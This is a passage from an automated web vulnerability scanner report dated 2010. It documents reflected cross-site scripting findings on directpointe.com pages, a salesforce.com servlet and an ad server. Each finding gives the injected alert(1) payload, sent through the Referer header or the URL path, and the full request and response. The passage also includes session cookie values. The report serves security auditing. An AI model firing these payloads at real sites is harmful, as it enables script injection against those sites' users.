<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=89c55"><script>alert(1)</script>00fa49d82d7" />
...[SNIP]...

2.266. http://www.directpointe.com/solutions/faq.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/faq.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30575"><script>alert(1)</script>625d9dfb404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/faq.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=30575"><script>alert(1)</script>625d9dfb404

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=30575"><script>alert(1)</script>625d9dfb404" />
...[SNIP]...

2.267. http://www.directpointe.com/solutions/index.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/index.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58913"><script>alert(1)</script>7a9d1e18438 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/index.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=58913"><script>alert(1)</script>7a9d1e18438

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27786


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=58913"><script>alert(1)</script>7a9d1e18438" />
...[SNIP]...

2.268. http://www.directpointe.com/solutions/industry_solutions.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/industry_solutions.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7a4"><script>alert(1)</script>d7c07aef017 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/industry_solutions.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=1a7a4"><script>alert(1)</script>d7c07aef017

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29031


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=1a7a4"><script>alert(1)</script>d7c07aef017" />
...[SNIP]...

2.269. http://www.directpointe.com/solutions/network_services.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/network_services.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81edd"><script>alert(1)</script>d90cba90a62 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/network_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=81edd"><script>alert(1)</script>d90cba90a62

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34895


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=81edd"><script>alert(1)</script>d90cba90a62" />
...[SNIP]...

2.270. http://www.directpointe.com/solutions/newsletter.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/newsletter.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491b9"><script>alert(1)</script>b3e60a476d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/newsletter.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=491b9"><script>alert(1)</script>b3e60a476d3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39022


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=491b9"><script>alert(1)</script>b3e60a476d3" />
...[SNIP]...

2.271. http://www.directpointe.com/solutions/pc_services.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/pc_services.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8832a"><script>alert(1)</script>0cd7a64e812 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/pc_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=8832a"><script>alert(1)</script>0cd7a64e812

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=8832a"><script>alert(1)</script>0cd7a64e812" />
...[SNIP]...

2.272. http://www.directpointe.com/solutions/print_services.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/print_services.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 692cd"><script>alert(1)</script>8b0e02254fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/print_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=692cd"><script>alert(1)</script>8b0e02254fa

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=692cd"><script>alert(1)</script>8b0e02254fa" />
...[SNIP]...

2.273. http://www.directpointe.com/solutions/professional_services.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/professional_services.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bc59"><script>alert(1)</script>a8a958513fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/professional_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=7bc59"><script>alert(1)</script>a8a958513fd

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27202


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=7bc59"><script>alert(1)</script>a8a958513fd" />
...[SNIP]...

2.274. http://www.directpointe.com/solutions/server_services.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/server_services.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd49"><script>alert(1)</script>17a849dc5b8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/server_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=6dd49"><script>alert(1)</script>17a849dc5b8

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=6dd49"><script>alert(1)</script>17a849dc5b8" />
...[SNIP]...

2.275. http://www.directpointe.com/solutions/virtual_services.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /solutions/virtual_services.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ac4"><script>alert(1)</script>7bf47ce86a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /solutions/virtual_services.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=c2ac4"><script>alert(1)</script>7bf47ce86a6

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=c2ac4"><script>alert(1)</script>7bf47ce86a6" />
...[SNIP]...

2.276. http://www.directpointe.com/thanks.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directpointe.com
Path:   /thanks.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45763"><script>alert(1)</script>c320424055c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. Techniques have existed in the past that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /thanks.aspx HTTP/1.1
Host: www.directpointe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=217701123.1290271597.1.1.utmgclid=CPCVrMXsr6UCFVNb2godUGtIXA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=los%20angeles%20it%20consulting; vkeywords=; s_sq=; __utma=217701123.1409149386.1290271597.1290271597.1290271597.1; velarosession=bs405bftbfjkfj55guiqnv45; velaroret5821=1; __utmc=217701123; __utmb=217701123.2.10.1290271597; ASP.NET_SessionId=tczsfa55n5sadr45wy0t5xqa; velaront1=yes;
Referer: http://www.google.com/search?hl=en&q=45763"><script>alert(1)</script>c320424055c

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Nov 2010 17:16:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Copyright .... 2000-2010 DirectPointe Inc.
All rights reserved. All
...[SNIP]...
<input id="referring_url" name="00NA0000002yNLC" type="hidden" value="http://www.google.com/search?hl=en&q=45763"><script>alert(1)</script>c320424055c" />
...[SNIP]...

2.277. https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 417d8'-alert(1)-'6dabe70f771 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servlet/servlet.WebToLead HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Sat, 20 Nov 2010 17:20:31 GMT
Connection: close
Content-Length: 498

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en
...[SNIP]...
<script>
if (window.location.replace){
window.location.replace('http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771');
} else {;
window.location.href ='http://www.google.com/search?hl=en&q=417d8'-alert(1)-'6dabe70f771';
}
</script>
...[SNIP]...

2.278. http://adserving.cpxadroit.com/i/i2.html [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserving.cpxadroit.com
Path:   /i/i2.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload a9064%0aalert(1)//ea22cc46ca0 was submitted in the REST URL parameter 1. This input was echoed as a9064
alert(1)//ea22cc46ca0
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ia9064%0aalert(1)//ea22cc46ca0/i2.html?t=2-1005410 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.vulnerable.ad.partner/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1290271648369?
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserving.cpxadroit.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 20 Nov 2010 16:50:23 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Accept-Ranges: none
Cache-Control: max-age=600
Server: Powered by Highwinds-Software
Location: http://209.197.9.89:80/v8u2m5i8/cds/ia9064
alert(1)//ea22cc46ca0/i2.html?t=2-1005410&dopvhost=adserving.cpxadroit.com&doppl=f34985b9bfae7b1e9c2d7b1e4de87247&dopsig=59a4e71d5e1e6b40fbc09352443cc997
Content-Length: 196
Content-Type: text/html

http://209.197.9.89:80/v8u2m5i8/cds/ia9064
alert(1)//ea22cc46ca0
/i2.html?t=2-1005410&dopvhost=adserving.cpxadroit.com&doppl=f34985b9bfae7b1e9c2d7b1e4de87247&dopsig=59a4e71d5e1e6b40fbc09352443cc997

2.279. http://adserving.cpxadroit.com/i/i2.html [REST URL parameter 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserving.cpxadroit.com
Path:   /i/i2.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 2a8a4%0aalert(1)//c9db6d901a9 was submitted in the REST URL parameter 2. This input was echoed as 2a8a4
alert(1)//c9db6d901a9
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

